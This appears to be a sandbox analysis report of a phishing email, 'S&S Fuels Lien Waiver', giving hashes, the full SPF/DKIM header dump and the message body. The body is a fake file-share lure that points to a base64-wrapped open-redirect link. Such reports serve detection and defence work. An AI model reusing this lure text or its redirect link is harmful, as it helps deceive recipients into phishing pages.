                                                                                                                    Preview:wOF2......+D.......x..*..K......................?FFTM....`..j.....\..|.6.$..t..|.. .....<[..qE.6.^.t...\^wg.3.....B/bM.8f.l..........G./..5......!...."R.!.... .o..LA........rVM..[.J...*O.k.l[.+X}..z>......#.hz...!y.f..]..Y..^`....+)@w,.......6.B-S...ve.1.^.....f...n.J.......+..........3J.}..5=..}|._...K.>.eX....w}.c.).?.@9..........-..g....-.1&.p.....l....).D..6....t...,i{.$)-.....S14El..O..Ta.......[./..`I.F...Y.%.@F..R..`Db`..UwF...W..........W.5*}.sL...L...;<.6..QW..5y.qp..w....-G. ....e.....FO.M....k..i/u.rk......d'9I..vuW.^x.....:.;F.....5B..r.?..3CD...._.......g..!P.@.1.4N|.......t..zOv.r`...p....\...^....q.O...._....\.]..g_..o.tf........y..._t.vk.4b.+ .N...E4..}.7w....y.A.......4........,..8q..m.......7.6..&..}..h...N..+...fX......cs...{g...i.t...n..I..!r<...3^..ly......A..........._...q.OGuW-.P.H..j...S..k?4,.i.<;.+:~.U.....E....k.}U....S..%s.L.... ..3'..{....BAKm(h.Dq.,...1..K.....}.U.bY. @6BZ.f}..1.....{...J...j..C.*....@....\Ve|
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (32012)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):69597
                                                                                                                    Entropy (8bit):5.369216080582935
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                    SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                    SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                    SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                                    Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                    File type:ASCII text, with CRLF line terminators
                                                                                                                    Entropy (8bit):5.659437075828673
                                                                                                                    TrID:
                                                                                                                      File name:phishing.eml
                                                                                                                      File size:118'363 bytes
                                                                                                                      MD5:95b6a2d5927a959942e4e347d9fc1cd5
                                                                                                                      SHA1:2e2db93e97bb3656e04acb6c71bf1cb680330461
                                                                                                                      SHA256:70b6c9068a8412464676637a616769b701f3b08aaa506e83cf8f6c7deb8625bf
                                                                                                                      SHA512:93f73c22f56fed81321e3f95f4397f4519246b2e6adc565aaac215cbea80965e83c436536d0535c2e2926a34c8f54676994a22b56ad37149bffff448621902b1
                                                                                                                      SSDEEP:768:ZcvxfsXk8jIeAqsZkikd/7TIxs9/bmTGWrIBzh2h9oujEPNuX0aFXZJi:evVsXk8jKhkhd0GWri24MEPNdaFXZJi
                                                                                                                      TLSH:A3C3501A4D59970F333B1C6E9A0BE53E3E641ECDBA2378AFB40E65DCC26540A2355EC4
                                                                                                                      File Content Preview:accept-language: en-US..arc-authentication-results: i=2; mx.microsoft.com 1; spf=pass (sender ip is.. 2a01:111:f403:2417::711) smtp.rcpttodomain=us.loomis.com.. smtp.mailfrom=ssfuels.com; dmarc=bestguesspass action=none.. header.from=ssfuels.com; dkim=pas
                                                                                                                      Subject:S&S Fuels Lien Waiver
                                                                                                                      From:Param Maroke <PMaroke@ssfuels.com>
                                                                                                                      To:Param Maroke <PMaroke@ssfuels.com>
                                                                                                                      Cc:
                                                                                                                      BCC:
                                                                                                                      Date:Tue, 25 Mar 2025 16:21:16 +0000
                                                                                                                      Communications:
                                                                                                                      • Some people who received this message don't often get email from pmaroke@ssfuels.com. Learn why this is important [SECURITY ADVISORY]: External Sender - Use caution when clicking links and opening attachmentsHello, Param Maroke has shared "S&S Fuels Lien Waiver" with you. View FiIe: S&S Fuels Lien Waiver [PDF]"Peruse FiIe and let me know if you have any questions". Thank you,Param MarokeRon KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.caRegards Gerardo RuizChief EngineerAston Martin Residences300 Biscayne Blvd. WayMiami, FL 33131 Please let me know if you have any questions.Sincerely,Thomas McQuoid, CPA, LCAMMcQuoid and Company CPA LLC224 Commercial Boulevard, Suite 310Lauderdale by the Sea, Florida 33308Office (954) 982 - 2947Important: Click Here to Learn About Our Free 2 Hour Course Available to LCAMs: How to Read and Interpret Financial Statements and Basic Budgeting Techniqueswww.mcquoidcpa.comIndustry Insights: www.mcquoidcpa.com/insights/This message contains confidential information and is intended only for the individual(s) named. If you are not the named addressee(s), you are notified that reviewing, disseminating, disclosing, copying or distributing this e-mail is strictly prohibited. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmissions cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain malware (such as viruses). The sender therefore does not accept liability for any loss or damage caused by malware, errors, or omissions in the contents of this message, which arise as a result of e-mail transmissions.Pursuant to Internal Revenue Service Circular 230, we are required to advise you that if there is any tax advice contained herein, it is not intended to be used, and cannot be used, by the addressee or any taxpayer, for the purpose of avoiding penalties that may be imposed under the Internal Revenue Code. <!-- p {margin-top:0; margin-bottom:0} --> Some people who received this message don't often get email from pmaroke@ssfuels.com. Learn why this is important [SECURITY ADVISORY]: External Sender - Use caution when clicking links and opening attachmentsHello, Param Maroke has shared "S&S Fuels Lien Waiver" with you. View FiIe: S&S Fuels Lien Waiver [PDF]"Peruse FiIe and let me know if you have any questions". Thank you,Param MarokeRon KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.caRegards Gerardo RuizChief EngineerAston Martin Residences300 Biscayne Blvd. WayMiami, FL 33131 Please let me know if you have any questions.Sincerely,Thomas McQuoid, CPA, LCAMMcQuoid and Company CPA LLC224 Commercial Boulevard, Suite 310Lauderdale by the Sea, Florida 33308Office (954) 982 - 2947Important: Click Here to Learn About Our Free 2 Hour Course Available to LCAMs: How to Read and Interpret Financial Statements and Basic Budgeting Techniqueswww.mcquoidcpa.comIndustry Insights: www.mcquoidcpa.com/insights/This message contains confidential information and is intended only for the individual(s) named. If you are not the named addressee(s), you are notified that reviewing, disseminating, disclosing, copying or distributing this e-mail is strictly prohibited. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmissions cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain malware (such as viruses). The sender therefore does not accept liability for any loss or damage caused by malware, errors, or omissions in the contents of this message, which arise as a result of e-mail transmissions.Pursuant to Internal Revenue Service Circular 230, we are required to advise you that if there is any tax advice contained herein, it is not intended to be used, and cannot be used, by the addressee or any taxpayer, for the purpose of avoiding penalties that may be imposed under the Internal Revenue Code. Some people who received this message don't often get email from pmaroke@ssfuels.com. Learn why this is important Some people who received this message don't often get email from pmaroke@ssfuels.com. Learn why this is important Some people who received this message don't often get email from pmaroke@ssfuels.com. Learn why this is important Some people who received this message don't often get email from pmaroke@ssfuels.com. Learn why this is important Some people who received this message don't often get email from pmaroke@ssfuels.com. Learn why this is important Learn why this is important https://aka.ms/LearnAboutSenderIdentification [SECURITY ADVISORY]: External Sender - Use caution when clicking links and opening attachmentsHello, Param Maroke has shared "S&S Fuels Lien Waiver" with you. View FiIe: S&S Fuels Lien Waiver [PDF]"Peruse FiIe and let me know if you have any questions". Thank you,Param MarokeRon KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.caRegards Gerardo RuizChief EngineerAston Martin Residences300 Biscayne Blvd. WayMiami, FL 33131 Please let me know if you have any questions.Sincerely,Thomas McQuoid, CPA, LCAMMcQuoid and Company CPA LLC224 Commercial Boulevard, Suite 310Lauderdale by the Sea, Florida 33308Office (954) 982 - 2947Important: Click Here to Learn About Our Free 2 Hour Course Available to LCAMs: How to Read and Interpret Financial Statements and Basic Budgeting Techniqueswww.mcquoidcpa.comIndustry Insights: www.mcquoidcpa.com/insights/This message contains confidential information and is intended only for the individual(s) named. If you are not the named addressee(s), you are notified that reviewing, disseminating, disclosing, copying or distributing this e-mail is strictly prohibited. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmissions cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain malware (such as viruses). The sender therefore does not accept liability for any loss or damage caused by malware, errors, or omissions in the contents of this message, which arise as a result of e-mail transmissions.Pursuant to Internal Revenue Service Circular 230, we are required to advise you that if there is any tax advice contained herein, it is not intended to be used, and cannot be used, by the addressee or any taxpayer, for the purpose of avoiding penalties that may be imposed under the Internal Revenue Code. [SECURITY ADVISORY]: External Sender - Use caution when clicking links and opening attachments [SECURITY ADVISORY]: External Sender - Use caution when clicking links and opening attachments Hello, Param Maroke has shared "S&S Fuels Lien Waiver" with you. View FiIe: S&S Fuels Lien Waiver [PDF]"Peruse FiIe and let me know if you have any questions". Thank you,Param MarokeRon KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.caRegards Gerardo RuizChief EngineerAston Martin Residences300 Biscayne Blvd. WayMiami, FL 33131 Please let me know if you have any questions.Sincerely,Thomas McQuoid, CPA, LCAMMcQuoid and Company CPA LLC224 Commercial Boulevard, Suite 310Lauderdale by the Sea, Florida 33308Office (954) 982 - 2947Important: Click Here to Learn About Our Free 2 Hour Course Available to LCAMs: How to Read and Interpret Financial Statements and Basic Budgeting Techniqueswww.mcquoidcpa.comIndustry Insights: www.mcquoidcpa.com/insights/This message contains confidential information and is intended only for the individual(s) named. If you are not the named addressee(s), you are notified that reviewing, disseminating, disclosing, copying or distributing this e-mail is strictly prohibited. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmissions cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain malware (such as viruses). The sender therefore does not accept liability for any loss or damage caused by malware, errors, or omissions in the contents of this message, which arise as a result of e-mail transmissions.Pursuant to Internal Revenue Service Circular 230, we are required to advise you that if there is any tax advice contained herein, it is not intended to be used, and cannot be used, by the addressee or any taxpayer, for the purpose of avoiding penalties that may be imposed under the Internal Revenue Code. Hello, Param Maroke has shared "S&S Fuels Lien Waiver" with you. S&S Fuels Lien Waiver View FiIe: S&S Fuels Lien Waiver [PDF] View FiIe: S&S Fuels Lien Waiver [PDF] S&S Fuels Lien Waiver [PDF] S&S Fuels Lien Waiver [PDF] https://blog.lenodal.com/exit.php?url=aHR0cHM6Ly9saW5rdHViZS5jb20vc3NmdWVscw==&entry_id=208 "Peruse FiIe and let me know if you have any questions". Thank you, Param Maroke Ron KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.ca Ron KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.ca Ron KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.ca Ron KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.ca Ron KulisekVice PresidentT: 514-366-2828C: 514-220-9389rkulisek@norlap.ca Ron Kulisek Vice President Vice President T: 514-366-2828 C: 514-220-9389 rkulisek@norlap.ca rkulisek@norlap.ca mailto:rkulisek@norlap.ca Regards Regards Gerardo Ruiz Gerardo Ruiz Chief Engineer Chief Engineer Aston Martin Residences Aston Martin Residences 300 Biscayne Blvd. Way 300 Biscayne Blvd. Way Miami, FL 33131 Miami, FL 33131 Please let me know if you have any questions.Sincerely,Thomas McQuoid, CPA, LCAMMcQuoid and Company CPA LLC224 Commercial Boulevard, Suite 310Lauderdale by the Sea, Florida 33308Office (954) 982 - 2947Important: Click Here to Learn About Our Free 2 Hour Course Available to LCAMs: How to Read and Interpret Financial Statements and Basic Budgeting Techniqueswww.mcquoidcpa.comIndustry Insights: www.mcquoidcpa.com/insights/ Please let me know if you have any questions.Sincerely, Thomas McQuoid, CPA, LCAM McQuoid and Company CPA LLC224 Commercial Boulevard, Suite 310Lauderdale by the Sea, Florida 33308Office (954) 982 - 2947Important: Click Here to Learn About Our Free 2 Hour Course Available to LCAMs: How to Read and Interpret Financial Statements and Basic Budgeting Techniques McQuoid and Company CPA LLC Important: Click Here to Learn About Our Free 2 Hour Course Available to LCAMs: How to Read and Interpret Financial Statements and Basic Budgeting Techniques https://mcquoidcpa.com/february-2025-newsletter-now-offering-ceus-for-cams/ www.mcquoidcpa.com www.mcquoidcpa.com http://www.mcquoidcpa.com/ Industry Insights: Industry Insights: www.mcquoidcpa.com/insights/ www.mcquoidcpa.com/insights/ www.mcquoidcpa.com/insights/ https://mcquoidcpa.com/insights/ This message contains confidential information and is intended only for the individual(s) named. If you are not the named addressee(s), you are notified that reviewing, disseminating, disclosing, copying or distributing this e-mail is strictly prohibited. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmissions cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain malware (such as viruses). The sender therefore does not accept liability for any loss or damage caused by malware, errors, or omissions in the contents of this message, which arise as a result of e-mail transmissions.Pursuant to Internal Revenue Service Circular 230, we are required to advise you that if there is any tax advice contained herein, it is not intended to be used, and cannot be used, by the addressee or any taxpayer, for the purpose of avoiding penalties that may be imposed under the Internal Revenue Code. This message contains confidential information and is intended only for the individual(s) named. If you are not the named addressee(s), you are notified that reviewing, disseminating, disclosing, copying or distributing this e-mail is strictly prohibited. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmissions cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain malware (such as viruses). The sender therefore does not accept liability for any loss or damage caused by malware, errors, or omissions in the contents of this message, which arise as a result of e-mail transmissions. Pursuant to Internal Revenue Service Circular 230, we are required to advise you that if there is any tax advice contained herein, it is not intended to be used, and cannot be used, by the addressee or any taxpayer, for the purpose of avoiding penalties that may be imposed under the Internal Revenue Code.
                                                                                                                      Attachments:
                                                                                                                      • image.png
                                                                                                                      • image.png
                                                                                                                      • image.png
                                                                                                                      • image.png
                                                                                                                      Key Value
                                                                                                                      accept-languageen-US
                                                                                                                      arc-authentication-resultsi=2; mx.microsoft.com 1; spf=pass (sender ip is 2a01:111:f403:2417::711) smtp.rcpttodomain=us.loomis.com smtp.mailfrom=ssfuels.com; dmarc=bestguesspass action=none header.from=ssfuels.com; dkim=pass (signature was verified) header.d=twinstarenergyllc.onmicrosoft.com; arc=pass (0 oda=1 ltdi=1 spf=[1,1,smtp.mailfrom=ssfuels.com] dkim=[1,1,header.d=ssfuels.com] dmarc=[1,1,header.from=ssfuels.com]), i=1; mx.microsoft.com 1; spf=pass smtp.mailfrom=ssfuels.com; dmarc=pass action=none header.from=ssfuels.com; dkim=pass header.d=ssfuels.com; arc=none
                                                                                                                      arc-message-signaturei=2; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=ypDJ8IowZb/cDeIoGnVTihruZ+UWoLVvf8xTLwQUtmQ=; b=vxJ5sJo1+HPRqL7sA2FNEUMZ8qzfbxHK/DBI7zsPX/biqKcc8cTzbXCK30fiVsxlwKtThGdnRelxjBrNi4ySDSlSeLyARcEmshqV5rwhjOqb8aimMc0kYci1NcMnlJYs0hc50p5AWJj5zierrcuCjfM7q1rXT2KP+ZV9CxtySNMEA0Bx9CoEsEc7saEfPH0K6x7twNUae6EyawDV/hHSK/radC0yqlFqK/AA1P53nMsyfiWHJjZN1X/9GsIPBnkVJb3+HFrawMgY+cNuYX6esZvCpyclmBXA4MOx9ZERwmpBc6MW/MirrgwhgHA35sYOREHTrmbdNjd7eWjbAgBidQ==, i=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=ypDJ8IowZb/cDeIoGnVTihruZ+UWoLVvf8xTLwQUtmQ=; b=mjNz2d3S+x9q4IZO8DE9A2U7eOIxfnvXbvixHoytv/t01bzYGo9+mo2T8gpAUFgED/AckMCQwowKMxaAs7R1UN89OmlKyJT64lM72HkrM0Uy5IVXdTaVaqC5pYcTB/SJqQ6A5N8XMwu9zmphjyaxwfLDOHIn+k5jmtfJ6YrCSHxZslxe0MEczMLgwoiO+lUZTxBVl0ZL35Dz1LOURCpzLeSkbUtRlZAkEfZtZSCaRpjoCwwU2F+ekymK/P1EiWVY4mXHFim8pAQGsptrpqnXNXLzHbO5so4s3KDEXLcrdw0tQXF+FdG6tvQUWEzxIbHLOLFhtuaFDg+pEI1hIqyJDg==
                                                                                                                      arc-seali=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass; b=KE1F5qJfbeiLqMKg2DgOfYNGz+dJARWOkQeMF1D+etBzqSjtzPWwA/Xiwy7Rg8AKujkgB7P4/liHdPVZR1aJMedU09f5V0YslV43gaFoUJ5qCDEuW6D3RFPAVloBcGCijn2DtBBcjfe+Q6iy561Rqs25wOMP+HUlWs0DKAcC0syOLkp6wWvEzXEwbZgVqzsC3scz9WDugqFECWTkUwXorj5dy8d4L8dtgl9WnffeRAGbZb6t9ludYIN8JvZd66ed2Xyu2M2xT95CPWmfk2JvmAT3jEF2jos4YhFklCebxBuqf6w9nN0KrEaYgN02OM/5psDPWL5sPV1KvyGlnVD7Ww==, i=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=fjdm9jyL4SW2mv6i97C3o7HYbTdx2AUOC7SPF2eacZot12qdftacBLHkJLu/rJIkM5FV5P1OE8nD5vXahSCWuBFL3VcrVJ5QWb1Y1TRF4o4FD1enomS+07DuUZOCXhxaYX9iJDedcDq/DMwk753/3GVdcMNXFJWMW5N4Y+dBr2Gt5CjsA6//9cWswDXFhEGxeYeCv2NGdf86UFauhq9MPwzLr6TYq3YEMlMZffeVWgqF6BzoeEUGMRjaCk+V8+/6nsSHRuIbQW0yX9MS+ajoHRMdqt9NgaAO79k5SFq/KGVO920XCTZ68T8NVPOfdqnVszzNPTR22ttoLV5xeE2W7g==
                                                                                                                      authentication-resultsspf=pass (sender IP is 2a01:111:f403:2417::711) smtp.mailfrom=ssfuels.com; dkim=pass (signature was verified) header.d=TwinStarEnergyLLC.onmicrosoft.com;dmarc=bestguesspass action=none header.from=ssfuels.com;compauth=pass reason=109
                                                                                                                      authentication-results-originaldkim=none (message not signed) header.d=none;dmarc=none action=none header.from=ssfuels.com;
                                                                                                                      dateTue, 25 Mar 2025 16:21:16 +0000
                                                                                                                      dkim-signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=TwinStarEnergyLLC.onmicrosoft.com; s=selector2-TwinStarEnergyLLC-onmicrosoft-com; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=ypDJ8IowZb/cDeIoGnVTihruZ+UWoLVvf8xTLwQUtmQ=; b=Ncz2EiQIzL8ds40PJsgW4lqGo6/QvvKwd8Z3LuPNb5xM1SWmu9XNvgcmtmY+u2x9Bjuk8Z2D4Q9E2iy6eMW+VkhT7woB+ItPIEholw4uZDPzah/F8Px5WqRCvya8A3a00rMT6Z3xYUP52nC3qTZUc9tNkUfIVIBBdzwJFF/LxeU=
                                                                                                                      fromParam Maroke <PMaroke@ssfuels.com>
                                                                                                                      message-id<BY3PR18MB4705ECE8F2DACD5C98FF7379B3A72@BY3PR18MB4705.namprd18.prod.outlook.com>
                                                                                                                      mime-version1.0
                                                                                                                      receivedfrom BN0PR01MB7120.prod.exchangelabs.com (2603:10b6:408:153::15) by BN7PR01MB3796.prod.exchangelabs.com with HTTPS; Tue, 25 Mar 2025 16:25:43 +0000, from VI1P190CA0038.EURP190.PROD.OUTLOOK.COM (2603:10a6:800:1bb::9) by BN0PR01MB7120.prod.exchangelabs.com (2603:10b6:408:153::15) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8534.42; Tue, 25 Mar 2025 16:25:42 +0000, from VI1P194MB0574.EURP194.PROD.OUTLOOK.COM (2603:10a6:800:1bb:cafe::ae) by VI1P190CA0038.outlook.office365.com (2603:10a6:800:1bb::9) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8534.42 via Frontend Transport; Tue, 25 Mar 2025 16:25:41 +0000, from DU7PR01CA0038.eurprd01.prod.exchangelabs.com (2603:10a6:10:50e::20) by VI1P194MB0574.EURP194.PROD.OUTLOOK.COM (2603:10a6:800:145::9) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8534.42; Tue, 25 Mar 2025 16:21:24 +0000, from DU2PEPF00028D07.eurprd03.prod.outlook.com (2603:10a6:10:50e:cafe::ec) by DU7PR01CA0038.outlook.office365.com (2603:10a6:10:50e::20) with Microsoft SMTP Server (version=TLS1_3, cipher=TLS_AES_256_GCM_SHA384) id 15.20.8534.42 via Frontend Transport; Tue, 25 Mar 2025 16:21:23 +0000, from NAM12-DM6-obe.outbound.protection.outlook.com (2a01:111:f403:2417::711) by DU2PEPF00028D07.mail.protection.outlook.com (2603:10a6:18:3::6a7) with Microsoft SMTP Server (version=TLS1_3, cipher=TLS_AES_256_GCM_SHA384) id 15.20.8534.20 via Frontend Transport; Tue, 25 Mar 2025 16:21:23 +0000, from BY3PR18MB4705.namprd18.prod.outlook.com (2603:10b6:a03:3c8::12) by SA3PR18MB5603.namprd18.prod.outlook.com (2603:10b6:806:39d::13) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8534.42; Tue, 25 Mar 2025 16:21:16 +0000, from BY3PR18MB4705.namprd18.prod.outlook.com ([fe80::1a4d:d74:bbd0:57fe]) by BY3PR18MB4705.namprd18.prod.outlook.com ([fe80::1a4d:d74:bbd0:57fe%3]) with mapi id 15.20.8534.040; Tue, 25 Mar 2025 16:21:16 +0000
                                                                                                                      received-spfPass (protection.outlook.com: domain of ssfuels.com designates 2a01:111:f403:2417::711 as permitted sender) receiver=protection.outlook.com; client-ip=2a01:111:f403:2417::711; helo=NAM12-DM6-obe.outbound.protection.outlook.com; pr=C
                                                                                                                      return-pathPMaroke@ssfuels.com
                                                                                                                      subjectS&S Fuels Lien Waiver
                                                                                                                      thread-indexAQHbnaHR6H51wj47RU+hzkVspT+d4Q==
                                                                                                                      thread-topicS&S Fuels Lien Waiver
                                                                                                                      toParam Maroke <PMaroke@ssfuels.com>
                                                                                                                      x-eopattributedmessage0
                                                                                                                      x-eoptenantattributedmessage60970b94-e7fb-4b69-b637-2cb121e1b596:0
                                                                                                                      x-forefront-antispam-reportCIP:2a01:111:f403:2417::711;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:NAM12-DM6-obe.outbound.protection.outlook.com;PTR:mail-dm6nam12on20711.outbound.protection.outlook.com;CAT:NONE;SFTY:9.25;SFS:(13230040)(4073199012)(35042699022)(5073199012)(39142699007)(31052699007)(4053099003)(13003099007)(8096899003);DIR:INB;SFTY:9.25;
                                                                                                                      x-forefront-antispam-report-untrustedCIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:BY3PR18MB4705.namprd18.prod.outlook.com;PTR:;CAT:NONE;SFS:(13230040)(1800799024)(376014)(366016)(7416014)(38070700018)(13003099007)(4053099003)(8096899003);DIR:OUT;SFP:1102;
                                                                                                                      x-ld-processed0380e19f-3d55-4dd5-b6e5-5614f97d6511,ExtAddr
                                                                                                                      x-microsoft-antispamBCL:0;ARA:13230040|4073199012|35042699022|5073199012|39142699007|31052699007|4053099003|13003099007|8096899003;
                                                                                                                      x-microsoft-antispam-mailbox-deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910005)(944506478)(944626604)(4710137)(4712040)(4999020)(920097)(930097)(140003);
                                                                                                                      x-microsoft-antispam-message-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
